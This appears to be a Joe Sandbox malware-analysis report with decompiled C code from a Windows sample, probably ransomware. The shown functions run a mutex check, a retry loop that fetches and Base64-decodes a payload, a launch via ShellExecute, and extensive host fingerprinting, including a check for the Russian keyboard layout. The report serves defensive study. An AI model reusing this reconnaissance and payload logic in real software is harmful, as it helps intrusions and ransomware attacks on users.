Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd

Yara matches

Similarity

API ID: ConditionMask$InfoVerifyVersion_memset
String ID:
API String ID: 3299124433-0
Opcode ID: 7cde68c66f9c015681154b08be74a03bb432d34b9aa19d53ad58b75a9a878dd1
Instruction ID: 675139515f83daa62978cf2687ed4dcf32745b37c88ce0392e5ff862a27301cc
Opcode Fuzzy Hash: 7cde68c66f9c015681154b08be74a03bb432d34b9aa19d53ad58b75a9a878dd1
Instruction Fuzzy Hash: 83111EB0D4031C6EEB609B65DC0ABEA7ABCEF08704F008199A548F61C1D6B95B948FD5

Uniqueness

Uniqueness Score: -1.00%

Function 00404BA0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 116
stringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00404BA0(intOrPtr* __ecx, CHAR* __edx, intOrPtr* _a4) {
				CHAR* _v8;
				char _v12;
				char _v20;
				char _t16;
				char _t20;
				char _t21;
				intOrPtr* _t24;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr* _t29;
				CHAR* _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				void* _t38;
				void* _t41;
				intOrPtr* _t42;
				void* _t47;
				void* _t49;
				intOrPtr* _t51;
				CHAR* _t53;

				asm("movq xmm0, [0x40ff2c]");
				_t16 =  *0x40ff34; // 0x0
				_t29 = _a4;
				_v8 = __edx;
				_t51 = __ecx;
				asm("movq [ebp-0x10], xmm0");
				_v12 = _t16;
				if( *_t29 == 0) {
					L11:
					if(_t51 == 0) {
						goto L10;
					} else {
						if(_v20 == 0) {
							L22:
							if(_t51 == 0) {
								goto L10;
							} else {
								_t53 = _t51 + lstrlenA( &_v20);
								while(1) {
									_t20 =  *_t53;
									if(_t20 >= 0x30 && _t20 <= 0x39) {
										break;
									}
									_t53 =  &(_t53[1]);
								}
								_t33 = _t53;
								while(1) {
									_t21 =  *_t33;
									if(_t21 < 0x30 || _t21 > 0x39) {
										goto L30;
									}
									L31:
									_t33 =  &(_t33[1]);
									continue;
									L30:
									if(_t21 == 0x2e) {
										goto L31;
									}
									 *_t33 = 0;
									return lstrcpyA(_v8, _t53);
									goto L33;
								}
							}
						} else {
							_t34 =  *_t51;
							if(_t34 != 0) {
								_t47 = _t51 -  &_v20;
								do {
									_t24 =  &_v20;
									if(_t34 == 0) {
										L19:
										if( *_t24 == 0) {
											goto L22;
										} else {
											goto L20;
										}
									} else {
										while(1) {
											_t35 =  *_t24;
											if(_t35 == 0) {
												goto L22;
											}
											_t41 =  *((char*)(_t47 + _t24)) - _t35;
											if(_t41 != 0) {
												goto L19;
											} else {
												_t24 = _t24 + 1;
												if( *((intOrPtr*)(_t47 + _t24)) != _t41) {
													continue;
												} else {
													goto L19;
												}
											}
											goto L33;
										}
										goto L22;
									}
									goto L33;
									L20:
									_t34 =  *((intOrPtr*)(_t51 + 1));
									_t51 = _t51 + 1;
									_t47 = _t47 + 1;
								} while (_t34 != 0);
							}
							goto L10;
						}
					}
				} else {
					_t25 =  *__ecx;
					if(_t25 == 0) {
						L10:
						return lstrcpyA(_v8, "fabian wosar <3");
					} else {
						_t49 = __ecx - _t29;
						do {
							_t42 = _t29;
							if(_t25 == 0) {
								L8:
								if( *_t42 == 0) {
									goto L11;
								} else {
									goto L9;
								}
							} else {
								while(1) {
									_t26 =  *_t42;
									if(_t26 == 0) {
										goto L11;
									}
									_t38 =  *((char*)(_t49 + _t42)) - _t26;
									if(_t38 != 0) {
										goto L8;
									} else {
										_t42 = _t42 + 1;
										if( *((intOrPtr*)(_t49 + _t42)) != _t38) {
											continue;
										} else {
											goto L8;
										}
									}
									goto L33;
								}
								goto L11;
							}
							goto L33;
							L9:
							_t25 =  *((intOrPtr*)(_t51 + 1));
							_t51 = _t51 + 1;
							_t49 = _t49 + 1;
						} while (_t25 != 0);
						goto L10;
					}
				}
				L33:
			}

0x00404ba6
0x00404bae
0x00404bb4
0x00404bb9
0x00404bbc
0x00404bc1
0x00404bc6
0x00404bc9
0x00404c1a
0x00404c1c
0x00000000
0x00404c1e
0x00404c22
0x00404c5f
0x00404c61
0x00000000
0x00404c63
0x00404c6d
0x00404c70
0x00404c70
0x00404c74
0x00000000
0x00000000
0x00404c7a
0x00404c7a
0x00404c7d
0x00404c80
0x00404c80
0x00404c84
0x00000000
0x00000000
0x00404c8e
0x00404c8e
0x00000000
0x00404c8a
0x00404c8c
0x00000000
0x00000000
0x00404c95
0x00404ca4
0x00000000
0x00404ca4
0x00404c80
0x00404c24
0x00404c24
0x00404c28
0x00404c2f
0x00404c31
0x00404c31
0x00404c36
0x00404c4f
0x00404c52
0x00000000
0x00000000
0x00000000
0x00000000
0x00404c38
0x00404c38
0x00404c38
0x00404c3c
0x00000000
0x00000000
0x00404c45
0x00404c47
0x00000000
0x00404c49
0x00404c49
0x00404c4d
0x00000000
0x00000000
0x00000000
0x00000000
0x00404c4d
0x00000000
0x00404c47
0x00000000
0x00404c38
0x00000000
0x00404c54
0x00404c54
0x00404c57
0x00404c58
0x00404c59
0x00404c5d
0x00000000
0x00404c28
0x00404c22
0x00404bcb
0x00404bcb
0x00404bcf
0x00404c05
0x00404c19
0x00404bd1
0x00404bd3
0x00404bd5
0x00404bd5
0x00404bd9
0x00404bf7
0x00404bfa
0x00000000
0x00000000
0x00000000
0x00000000
0x00404bdb
0x00404be0
0x00404be0
0x00404be4
0x00000000
0x00000000
0x00404bed
0x00404bef
0x00000000
0x00404bf1
0x00404bf1
0x00404bf5
0x00000000
0x00000000
0x00000000
0x00000000
0x00404bf5
0x00000000
0x00404bef
0x00000000
0x00404be0
0x00000000
0x00404bfc
0x00404bfc
0x00404bff
0x00404c00
0x00404c01
0x00000000
0x00404bd5
0x00404bcf
0x00000000

APIs

lstrcpyA.KERNEL32(?,fabian wosar <3,?,00404E7E), ref: 00404C0D
lstrlenA.KERNEL32(00000000,?,00404E7E), ref: 00404C67
lstrcpyA.KERNEL32(?,?,?,00404E7E), ref: 00404C98

Strings

fabian wosar <3, xrefs: 00404C05

Memory Dump Source

Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen
String ID: fabian wosar <3
API String ID: 367037083-1724090804
Opcode ID: a904c25ae265fe742736e648722e0dad384a46136875b74b9355d29ccf0e1a05
Instruction ID: 61f71b58efb5150348b69fdc6af893256ae21e9068894ab04c691d9c03621922
Opcode Fuzzy Hash: a904c25ae265fe742736e648722e0dad384a46136875b74b9355d29ccf0e1a05
Instruction Fuzzy Hash: CE3128A180E1955BEB328E6844143BBBFA19FC3301F1A01BBCAD1B7386D2394C46C798

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: vkspii.exePID: 6028, Parent PID: 3452COMMON

Execution Graph

Execution Coverage:	6.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	700
Total number of Limit Nodes:	10

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 004048A0 Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 165
threadsleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004048A0(void* __ecx) {
				void* _v8;
				CHAR* _v12;
				int _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				int _v44;
				int _v48;
				void* _v52;
				char _v72;
				void* _t50;
				int _t75;
				void* _t77;
				short* _t98;
				void* _t102;

				_t82 = __ecx;
				Sleep(0x3e8); // executed
				_t50 = E00404550(_t82); // executed
				if(_t50 != 0) {
					ExitProcess(0); // executed
				}
				_v8 = CreateThread(0, 0, E00402D30, 0, 0, 0);
				if(_v8 != 0) {
					if(WaitForSingleObject(_v8, 0x1388) == 0x102) {
						_t82 = _v8;
						TerminateThread(_v8, 0);
					}
					CloseHandle(_v8);
				}
				E00404640();
				E004040A0(_t82);
				E00405EF0( &_v72);
				_v36 = 0;
				_v32 = 0;
				_v24 = 0;
				_v40 = 0;
				_t97 =  &_v40;
				E00405EA0( &_v72,  &_v24,  &_v40,  &_v36,  &_v32);
				_v44 = 0;
				_v12 = 0;
				if(E00404880(_v24) != 0) {
					ExitProcess(0);
				}
				L8:
				while(_v44 == 0) {
					_t97 = _v40;
					_t77 = E00405750(_v24, _v40, _v36, _v32,  &_v12);
					_t102 = _t102 + 0xc;
					if(_t77 != 0) {
						_v44 = 1;
					} else {
						Sleep(0x2710);
					}
				}
				E00405E60( &_v72);
				_v28 = 0;
				_v16 = 0;
				_v48 = 0;
				_v52 = 0;
				__eflags = _v12;
				if(_v12 != 0) {
					_v16 = lstrlenA(_v12);
					_v28 = VirtualAlloc(0, _v16, 0x3000, 4);
					_t97 = _v12;
					_t75 = CryptStringToBinaryA(_v12, 0, 1, _v28,  &_v16, 0, 0);
					__eflags = _t75;
					if(_t75 == 0) {
						ExitProcess(0);
					}
					_v48 = 1;
				}
				E00403FF0();
				InitializeCriticalSection(0x412ae8);
				__eflags = _v48;
				if(__eflags == 0) {
					E00403DE0( &_v72);
				} else {
					_t97 = _v16;
					E00403FC0(_v28, _v16, __eflags);
				}
				DeleteCriticalSection(0x412ae8);
				__eflags = E00403A60();
				if(__eflags != 0) {
					E00404330(__eflags);
				}
				_v20 = VirtualAlloc(0, 0x200, 0x3000, 4);
				__eflags = _v20;
				if(__eflags != 0) {
					GetModuleFileNameW(0, _v20, 0x100);
					E00403BA0(_v20, _t97, __eflags);
					VirtualFree(_v20, 0, 0x8000);
				}
				__eflags =  *0x412ae4;
				if( *0x412ae4 != 0) {
					_t98 =  *0x412ae4; // 0x8d0000
					ShellExecuteW(0, L"open", _t98, 0, 0, 5);
				}
				return E00405FC0( &_v72);
				goto L8;
			}

0x004048a0
0x004048ab
0x004048b1
0x004048b8
0x004048bc
0x004048bc
0x004048d7
0x004048de
0x004048f4
0x004048f8
0x004048fc
0x004048fc
0x00404906
0x00404906
0x0040490c
0x00404911
0x00404919
0x0040491e
0x00404925
0x0040492c
0x00404933
0x00404942
0x0040494d
0x00404952
0x00404959
0x0040496a
0x0040496e
0x0040496e
0x00000000
0x00404974
0x00404986
0x0040498c
0x00404991
0x00404996
0x004049a5
0x00404998
0x0040499d
0x0040499d
0x004049ac
0x004049b1
0x004049b6
0x004049bd
0x004049c4
0x004049cb
0x004049d2
0x004049d6
0x004049e2
0x004049f8
0x00404a0b
0x00404a0f
0x00404a15
0x00404a17
0x00404a1b
0x00404a1b
0x00404a21
0x00404a21
0x00404a28
0x00404a32
0x00404a38
0x00404a3c
0x00404a4e
0x00404a3e
0x00404a3e
0x00404a44
0x00404a44
0x00404a58
0x00404a63
0x00404a65
0x00404a67
0x00404a67
0x00404a80
0x00404a83
0x00404a87
0x00404a94
0x00404a9d
0x00404aad
0x00404aad
0x00404ab3
0x00404aba
0x00404ac2
0x00404ad0
0x00404ad0
0x00404ae1
0x00000000

APIs

Sleep.KERNELBASE(000003E8), ref: 004048AB

Part of subcall function 00404550: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004045AC
Part of subcall function 00404550: lstrcpyW.KERNEL32 ref: 004045CF
Part of subcall function 00404550: lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004045D6
Part of subcall function 00404550: CreateMutexW.KERNELBASE(00000000,00000000,00000000,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004045EE
Part of subcall function 00404550: GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004045FA
Part of subcall function 00404550: GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00404601
Part of subcall function 00404550: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0040461B

ExitProcess.KERNEL32 ref: 004048BC
CreateThread.KERNEL32 ref: 004048D1
WaitForSingleObject.KERNEL32(00000000,00001388), ref: 004048E9
TerminateThread.KERNEL32(00000000,00000000), ref: 004048FC
CloseHandle.KERNEL32(00000000), ref: 00404906
ExitProcess.KERNEL32 ref: 0040496E

Strings

open, xrefs: 00404AC9

Memory Dump Source

Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: CreateErrorExitLastProcessThreadVirtual$AllocCloseFreeHandleMutexObjectSingleSleepTerminateWaitlstrcpylstrlen
String ID: open
API String ID: 3160775492-2758837156
Opcode ID: 2adaf577edfec1f8d3a4591ce7ab69e68017f846f83df95990bf0665a8258e38
Instruction ID: 2fe3139fa9bd6d9f2b7618e63861a0a4b2c33c0f11c60c5fb30394d5f0607533
Opcode Fuzzy Hash: 2adaf577edfec1f8d3a4591ce7ab69e68017f846f83df95990bf0665a8258e38
Instruction Fuzzy Hash: FD612CB0A40209ABEB14EFA1DD4ABEF7774AB84705F104029F601BA2D1DBB85E45CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00406D90 Relevance: 154.6, APIs: 62, Strings: 26, Instructions: 551
registrymemorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E00406D90(char* __ecx) {
				WCHAR* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				long _v24;
				int _v28;
				int _v32;
				short _v36;
				short _v40;
				WCHAR* _v44;
				WCHAR* _v48;
				WCHAR* _v52;
				WCHAR* _v56;
				WCHAR* _v60;
				WCHAR* _v64;
				WCHAR* _v68;
				signed short _v76;
				char _v132;
				void* _t182;
				long _t183;
				short _t186;
				short _t187;
				short _t188;
				signed int _t189;
				signed int _t194;
				void* _t209;
				signed int _t211;
				signed int _t214;
				WCHAR* _t218;
				WCHAR* _t219;
				long _t228;
				_Unknown_base(*)()* _t233;
				long _t242;
				signed int _t245;
				intOrPtr _t250;
				WCHAR* _t252;
				WCHAR* _t254;
				void* _t263;
				WCHAR* _t269;
				void* _t278;
				WCHAR* _t286;
				void* _t287;
				WCHAR* _t289;
				WCHAR* _t290;
				WCHAR* _t292;
				DWORD* _t296;
				char* _t300;
				short* _t301;
				DWORD* _t307;
				signed int _t310;
				void* _t314;
				char* _t316;
				char* _t318;
				void* _t319;
				void* _t320;

				_t300 = __ecx;
				_t318 = __ecx;
				if( *__ecx != 0) {
					_t292 = VirtualAlloc(0, 0x202, 0x3000, 4);
					_t300 =  &_v28;
					 *(_t318 + 8) = _t292;
					_v28 = 0x100;
					GetUserNameW(_t292, _t300);
				}
				if( *((intOrPtr*)(_t318 + 0xc)) != 0) {
					_v28 = 0x1e;
					_t290 = VirtualAlloc(0, 0x20, 0x3000, 4);
					_t300 =  &_v28;
					 *(_t318 + 0x14) = _t290;
					GetComputerNameW(_t290, _t300);
				}
				if( *((intOrPtr*)(_t318 + 0x18)) == 0) {
					L11:
					if( *(_t318 + 0x30) == 0) {
						L18:
						if( *((intOrPtr*)(_t318 + 0x3c)) == 0) {
							L35:
							if( *((intOrPtr*)(_t318 + 0x48)) == 0) {
								L42:
								if( *((intOrPtr*)(_t318 + 0x54)) == 0) {
									L51:
									if( *((intOrPtr*)(_t318 + 0x24)) != 0) {
										_v32 = 0;
										_t250 = E00407520(_t318 + 0x2c,  &_v32);
										if(_t250 == 0) {
											 *((intOrPtr*)(_t318 + 0x24)) = _t250;
										}
									}
									if( *((intOrPtr*)(_t318 + 0x60)) != 0) {
										_t218 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
										 *(_t318 + 0x68) = _t218;
										_t219 = VirtualAlloc(0, 0xe0c, 0x3000, 4); // executed
										_v16 = _t219;
										_t81 =  &(_t219[0x306]); // 0x60c
										_v8 = _t81;
										GetWindowsDirectoryW(_t219, 0x100);
										_t300 = _v16;
										_t300[6] = 0;
										_t85 =  &(_t300[0x600]); // 0x600
										_t307 = _t85;
										_t86 =  &(_t300[0x400]); // 0x400
										_v20 = _t307;
										_t88 =  &(_t300[0x604]); // 0x604
										_t89 =  &(_t300[0x608]); // 0x608
										_t90 =  &(_t300[0x200]); // 0x200
										GetVolumeInformationW(_t300, _t90, 0x100, _t307, _t89, _t88, _t86, 0x100); // executed
										_v24 = 0;
										_t228 = RegOpenKeyExW(0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", 0, 0x20019,  &_v28); // executed
										if(_t228 == 0) {
											_t300 = _v8;
											_v32 = 0x80;
											_t242 = RegQueryValueExW(_v28, L"ProcessorNameString", 0, 0, _t300,  &_v32); // executed
											if(_t242 != 0) {
												GetLastError();
											} else {
												_v24 = 1;
											}
											RegCloseKey(_v28);
											if(_v24 != 0) {
												_t245 = lstrlenW(_v8);
												_t300 = _v8;
												_push(_t300);
												E00406D10(_t300, 0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", L"Identifier", _t300 + _t245 * 2, 0x80); // executed
											}
										}
										wsprintfW( *(_t318 + 0x68), L"%d",  *_v20);
										_t320 = _t320 + 0xc;
										lstrcatW( *(_t318 + 0x68), _v8);
										_t233 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "RtlComputeCrc32");
										_v32 = _t233;
										if(_t233 == 0) {
											 *(_t318 + 0x6c) = 0;
										} else {
											 *(_t318 + 0x6c) = _v32(0x29a,  *(_t318 + 0x68), lstrlenW( *(_t318 + 0x68)) + _t238);
										}
										 *(_t318 + 0x70) =  *_v20;
										VirtualFree(_v16, 0, 0x8000); // executed
									}
									if( *((intOrPtr*)(_t318 + 0x74)) == 0) {
										L78:
										if( *(_t318 + 0x80) == 0) {
											L83:
											return 1;
										}
										_t182 = VirtualAlloc(0, 0x81, 0x3000, 4);
										 *(_t318 + 0x84) = _t182;
										if(_t182 == 0) {
											L82:
											 *(_t318 + 0x80) = 0;
											goto L83;
										}
										_push(_t300);
										_t183 = E004068F0(_t182);
										if(_t183 != 0) {
											goto L83;
										}
										VirtualFree( *(_t318 + 0x84), _t183, 0x8000);
										goto L82;
									} else {
										_v68 = L"UNKNOWN";
										_v64 = L"NO_ROOT_DIR";
										_v60 = L"REMOVABLE";
										_v56 = L"FIXED";
										_v52 = L"REMOTE";
										_v48 = L"CDROM";
										_v44 = L"RAMDISK";
										 *(_t318 + 0x7c) = VirtualAlloc(0, 0x400, 0x3000, 4);
										_t301 =  &_v132;
										_t186 = 0x41;
										do {
											 *_t301 = _t186;
											_t301 = _t301 + 2;
											_t186 = _t186 + 1;
										} while (_t186 <= 0x5a);
										_t187 =  *L"?:\\"; // 0x3a003f
										_v40 = _t187;
										_t188 =  *0x40e308; // 0x5c
										_v36 = _t188;
										_t189 = 0;
										_v28 = 0;
										do {
											_v40 =  *((intOrPtr*)(_t319 + _t189 * 2 - 0x80));
											_t310 = GetDriveTypeW( &_v40);
											if(_t310 > 2 && _t310 != 5) {
												_v36 = 0;
												lstrcatW( *(_t318 + 0x7c),  &_v40);
												_v36 = 0x5c;
												lstrcatW( *(_t318 + 0x7c),  *(_t319 + _t310 * 4 - 0x40));
												lstrcatW( *(_t318 + 0x7c), "_");
												if(GetDiskFreeSpaceW( &_v40,  &_v32,  &_v24,  &_v16,  &_v20) == 0) {
													lstrcatW( *(_t318 + 0x7c), L"0,");
													goto L75;
												}
												_v12 = E00408470(_v20, 0, _v32 * _v24, 0);
												_t296 = _t307;
												_t209 = E00408470(_v16, 0, _v32 * _v24, 0);
												_t314 = _v12;
												_v8 = _t314 - _t209;
												asm("sbb eax, edx");
												_v12 = _t296;
												_t211 = lstrlenW( *(_t318 + 0x7c));
												_push(_t296);
												wsprintfW( &(( *(_t318 + 0x7c))[_t211]), L"%I64u/", _t314);
												_t214 = lstrlenW( *(_t318 + 0x7c));
												_push(_v12);
												wsprintfW( &(( *(_t318 + 0x7c))[_t214]), L"%I64u", _v8);
												_t320 = _t320 + 0x20;
												lstrcatW( *(_t318 + 0x7c), ",");
											}
											_t189 =  &(1[_v28]);
											_v28 = _t189;
										} while (_t189 < 0x1b);
										_t194 = lstrlenW( *(_t318 + 0x7c));
										_t300 =  *(_t318 + 0x7c);
										_t300[_t194 * 2 - 2] = 0;
										goto L78;
									}
								}
								__imp__GetNativeSystemInfo( &_v76);
								_t252 = VirtualAlloc(0, 0x40, 0x3000, 4);
								_t300 = _v76 & 0x0000ffff;
								 *(_t318 + 0x5c) = _t252;
								if(_t300 > 9) {
									L49:
									_push(L"Unknown");
									L50:
									wsprintfW(_t252, ??);
									_t320 = _t320 + 8;
									goto L51;
								}
								_t300 = _t300[E00407510] & 0x000000ff;
								switch( *((intOrPtr*)(_t300 * 4 +  &M004074FC))) {
									case 0:
										_push(L"x86");
										goto L50;
									case 1:
										_push(L"ARM");
										goto L50;
									case 2:
										_push(L"Itanium");
										goto L50;
									case 3:
										_push(L"x64");
										goto L50;
									case 4:
										goto L49;
								}
							}
							_t254 = VirtualAlloc(0, 0x82, 0x3000, 4);
							_v20 = _t254;
							 *(_t318 + 0x50) = _t254;
							_v24 = 0;
							if(RegOpenKeyExW(0x80000002, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", 0, 0x20019,  &_v28) != 0) {
								L41:
								_push(_t300);
								E00406D10(_t300, 0x80000002, L"SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion", L"productName",  *(_t318 + 0x50), 0x80);
								wsprintfW( *(_t318 + 0x50), L"error");
								_t320 = _t320 + 8;
								goto L42;
							}
							_v32 = 0x80;
							if(RegQueryValueExW(_v28, L"productName", 0, 0, _v20,  &_v32) != 0) {
								GetLastError();
							} else {
								_v24 = 1;
							}
							RegCloseKey(_v28);
							if(_v24 != 0) {
								goto L42;
							} else {
								goto L41;
							}
						}
						_t263 = VirtualAlloc(0, 0x8a, 0x3000, 4);
						_v16 = _t263;
						_v28 = _t263 + 0xe;
						 *(_t318 + 0x44) = VirtualAlloc(0, 4, 0x3000, 4);
						_t316 = 1;
						_v8 = 1;
						_v12 = 0;
						do {
							wsprintfW(_v16, L"%d", _t316);
							_t320 = _t320 + 0xc;
							_v24 = 0;
							_t316 =  &(_t316[1]);
							if(RegOpenKeyExW(0x80000001, L"Keyboard Layout\\Preload", 0, 0x20019,  &_v20) != 0) {
								L27:
								_t269 = 0;
								_v8 = 0;
								L29:
								_t300 = _v12;
								goto L30;
							}
							_v32 = 0x80;
							if(RegQueryValueExW(_v20, _v16, 0, 0, _v28,  &_v32) != 0) {
								GetLastError();
							} else {
								_v24 = 1;
							}
							RegCloseKey(_v20);
							if(_v24 == 0) {
								goto L27;
							} else {
								if(lstrcmpiW(_v28, L"00000419") != 0) {
									_t269 = _v8;
									goto L29;
								}
								wsprintfW( *(_t318 + 0x44), "1");
								_t320 = _t320 + 8;
								_t300 = 1;
								_t269 = 0;
								_v12 = 1;
								_v8 = 0;
							}
							L30:
						} while (_t316 != 9 && _t269 != 0);
						if(_t300 == 0) {
							wsprintfW( *(_t318 + 0x44), "0");
							_t320 = _t320 + 8;
						}
						VirtualFree(_v16, 0, 0x8000);
						goto L35;
					}
					_t278 = VirtualAlloc(0, 0x80, 0x3000, 4);
					_v24 = _t278;
					 *(_t318 + 0x38) = _t278;
					_v12 = 0;
					if(RegOpenKeyExW(0x80000001, L"Control Panel\\International", 0, 0x20019,  &_v16) != 0) {
						L17:
						 *(_t318 + 0x30) = 0;
						VirtualFree( *(_t318 + 0x38), 0, 0x8000);
						goto L18;
					}
					_v28 = 0x40;
					if(RegQueryValueExW(_v16, L"LocaleName", 0, 0, _v24,  &_v28) != 0) {
						GetLastError();
					} else {
						_v12 = 1;
					}
					RegCloseKey(_v16);
					if(_v12 != 0) {
						goto L18;
					} else {
						goto L17;
					}
				} else {
					_t286 = VirtualAlloc(0, 0x80, 0x3000, 4); // executed
					 *(_t318 + 0x20) = _t286;
					if(_t286 == 0) {
						goto L11;
					}
					_push(_t300);
					_t287 = E00406D10(_t300, 0x80000002, L"SYSTEM\\CurrentControlSet\\services\\Tcpip\\Parameters", L"Domain", _t286, 0x80); // executed
					if(_t287 == 0) {
						wsprintfW( *(_t318 + 0x20), L"undefined");
						L10:
						_t320 = _t320 + 8;
						goto L11;
					}
					_t289 =  *(_t318 + 0x20);
					if( *_t289 != 0) {
						goto L11;
					}
					wsprintfW(_t289, L"WORKGROUP");
					goto L10;
				}
			}

0x00406d90
0x00406d9b
0x00406da7
0x00406db7
0x00406db9
0x00406dbc
0x00406dc1
0x00406dc8
0x00406dc8
0x00406dd2
0x00406ddf
0x00406de6
0x00406de8
0x00406deb
0x00406df0
0x00406df0
0x00406e00
0x00406e56
0x00406e5a
0x00406ef5
0x00406ef9
0x00407024
0x00407028
0x004070d6
0x004070da
0x00407134
0x00407138
0x0040713d
0x00407149
0x00407150
0x00407152
0x00407152
0x00407150
0x00407159
0x0040716d
0x0040717d
0x00407180
0x00407188
0x0040718b
0x00407191
0x00407194
0x0040719a
0x004071a4
0x004071a8
0x004071a8
0x004071ae
0x004071b4
0x004071b8
0x004071bf
0x004071cc
0x004071d4
0x004071dd
0x004071f6
0x004071fe
0x00407200
0x00407214
0x0040721b
0x00407223
0x0040722e
0x00407225
0x00407225
0x00407225
0x00407237
0x00407241
0x00407246
0x0040724c
0x0040724f
0x00407268
0x00407268
0x00407241
0x0040727a
0x00407282
0x0040728b
0x0040729e
0x004072a4
0x004072a9
0x004072c7
0x004072ab
0x004072c2
0x004072c2
0x004072da
0x004072e1
0x004072e1
0x004072f3
0x004074a0
0x004074a7
0x004074f0
0x004074f9
0x004074f9
0x004074b7
0x004074bd
0x004074c5
0x004074e4
0x004074e4
0x00000000
0x004074e4
0x004074c7
0x004074c9
0x004074d0
0x00000000
0x00000000
0x004074de
0x00000000
0x004072f9
0x00407307
0x0040730e
0x00407315
0x0040731c
0x00407323
0x0040732a
0x00407331
0x0040733a
0x0040733d
0x00407340
0x00407345
0x00407345
0x00407348
0x0040734b
0x0040734c
0x00407352
0x00407357
0x0040735a
0x0040735f
0x00407362
0x00407364
0x00407370
0x00407375
0x00407383
0x00407388
0x00407399
0x004073a4
0x004073b2
0x004073b6
0x004073c0
0x004073de
0x00407479
0x00000000
0x00407479
0x00407400
0x00407403
0x00407405
0x0040740a
0x00407416
0x00407419
0x0040741b
0x0040741e
0x00407427
0x00407438
0x00407446
0x00407448
0x0040745a
0x00407462
0x0040746d
0x0040746d
0x00407484
0x00407485
0x00407488
0x00407494
0x00407496
0x0040749b
0x00000000
0x0040749b
0x004072f3
0x004070e0
0x004070f1
0x004070f3
0x004070f7
0x004070fd
0x00407129
0x00407129
0x0040712e
0x0040712f
0x00407131
0x00000000
0x00407131
0x004070ff
0x00407106
0x00000000
0x00407122
0x00000000
0x00000000
0x00407114
0x00000000
0x00000000
0x0040711b
0x00000000
0x00000000
0x0040710d
0x00000000
0x00000000
0x00000000
0x00000000
0x00407106
0x0040703c
0x0040703e
0x00407041
0x00407059
0x00407068
0x004070ac
0x004070ac
0x004070c4
0x004070d1
0x004070d3
0x00000000
0x004070d3
0x0040706d
0x0040708c
0x00407097
0x0040708e
0x0040708e
0x0040708e
0x004070a0
0x004070aa
0x00000000
0x00000000
0x00000000
0x00000000
0x004070aa
0x00406f0d
0x00406f16
0x00406f20
0x00406f25
0x00406f28
0x00406f2d
0x00406f34
0x00406f40
0x00406f49
0x00406f4b
0x00406f4e
0x00406f58
0x00406f73
0x00406fe3
0x00406fe3
0x00406fe5
0x00406fed
0x00406fed
0x00000000
0x00406fed
0x00406f78
0x00406f95
0x00406fa0
0x00406f97
0x00406f97
0x00406f97
0x00406fa9
0x00406fb3
0x00000000
0x00406fb5
0x00406fc5
0x00406fea
0x00000000
0x00406fea
0x00406fcf
0x00406fd1
0x00406fd4
0x00406fd9
0x00406fdb
0x00406fde
0x00406fde
0x00406ff0
0x00406ff0
0x00406fff
0x00407009
0x0040700b
0x0040700b
0x00407018
0x00000000
0x0040701e
0x00406e6e
0x00406e70
0x00406e73
0x00406e8b
0x00406e9a
0x00406ede
0x00406ee8
0x00406eef
0x00000000
0x00406eef
0x00406e9f
0x00406ebe
0x00406ec9
0x00406ec0
0x00406ec0
0x00406ec0
0x00406ed2
0x00406edc
0x00000000
0x00000000
0x00000000
0x00000000
0x00406e02
0x00406e10
0x00406e12
0x00406e17
0x00000000
0x00000000
0x00406e19
0x00406e2f
0x00406e36
0x00406e51
0x00406e51
0x00406e53
0x00000000
0x00406e53
0x00406e38
